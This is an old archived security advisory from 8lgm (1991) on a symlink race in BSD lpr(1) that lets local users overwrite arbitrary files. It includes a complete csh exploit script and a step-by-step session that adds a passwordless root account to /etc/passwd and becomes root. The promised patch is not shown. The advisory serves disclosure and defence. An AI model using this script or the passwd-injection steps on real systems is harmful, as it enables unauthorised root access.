TUCoPS :: BSD :: lpr.txt

Overwrite files with bug in lpr in BSD


[8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991

PROGRAM:

 lpr(1)  (/usr/ucb/lpr or /usr/bin/lpr)

VULNERABLE OS's:

 SunOS 4.1.1 or earlier
 BSD 4.3
 BSD NET/2 Derived Systems
 A/UX 2.0.1

 Most systems supporting the BSD LP subsystem


DESCRIPTION:

 lpr(1) can be used to overwrite or create (and become owner of)
 any file on the system.  lpr -s allows users to create symbolic
 links in lpd's spool directory (typically /var/spool/lpd).
 After 1000 invocations of lpr, lpr will reuse the filename in
 the spool directory, and follow the link previously installed.
 It will thus overwrite/create any file that this link points too.

IMPACT:

 Any user with access to lpr(1) can alter system files and thus
 become root.

REPEAT BY:

 This example demonstrates how to become root on most affected
 machines by modifying /etc/passwd and /etc/group.  Please do
 not do this unless you have permission.

 Create the following script, 'lprcp':

8<--------------------------- cut here ----------------------------
#!/bin/csh -f
#
# Usage: lprcp from-file to-file
#

if ($#argv != 2) then
 echo Usage: lprcp from-file to-file
 exit 1
endif

# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$  # lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$  # to where we really want

@ s = 0
while ( $s != 999)  # loop 999 times
 lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
 @ s++
 if ( $s % 10 == 0 ) echo -n .
end
lpr $1    # incoming file
    # user becomes owner
rm -f /tmp/.tmp.$$
exit 0
8<--------------------------- cut here ----------------------------

 (Lines marked with > represent user input)

Make copies of /etc/passwd and /etc/group, and modify them:
> % id
 uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % cp /etc/passwd /tmp/passwd
> % ex /tmp/passwd
 /tmp/passwd: unmodified: line 42
> :a
> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
> .
> :wq
 /tmp/passwd: 43 lines, 2188 characters.
> % cp /etc/group /tmp
> % ex /tmp/group
 /tmp/group: unmodified: line 49
> :/wheel
 wheel:*:0:root,operator
> :c
> wheel:*:0:root,operator,8lgm
> .
> :wq
 /tmp/group: 49 lines, 944 characters.

Install our new files:
> % ./lprcp /tmp/group /etc/group
 ................................................................
 ...................................
 lpr: cannot rename /var/spool/lpd/cfA060testnode
> % ./lprcp /tmp/passwd /etc/passwd
 .................................................................
 ..................................
 lpr: cannot rename /var/spool/lpd/cfA061testnode

Check it worked:
> % ls -l /etc/passwd /etc/group
 -rw-r--r--    1 8lgm          944 Mar  3 19:56 /etc/group
 -rw-r--r--    1 8lgm         2188 Mar  3 19:59 /etc/passwd
> % head -1 /etc/group
 wheel:*:0:root,operator,8lgm
> % grep '^8lgmroot' /etc/passwd
 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh

Become root and tidy up:
> % su 8lgmroot
 # chown root /etc/passwd /etc/group
 # rm -f /tmp/passwd /tmp/group
 #

FIX:

 1. Contact your vendor for a fix.
 2. In the meantime, apply the following patch, derived from
    BSD NET/2 source, which will correct the flaw on most
    affected systems:


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH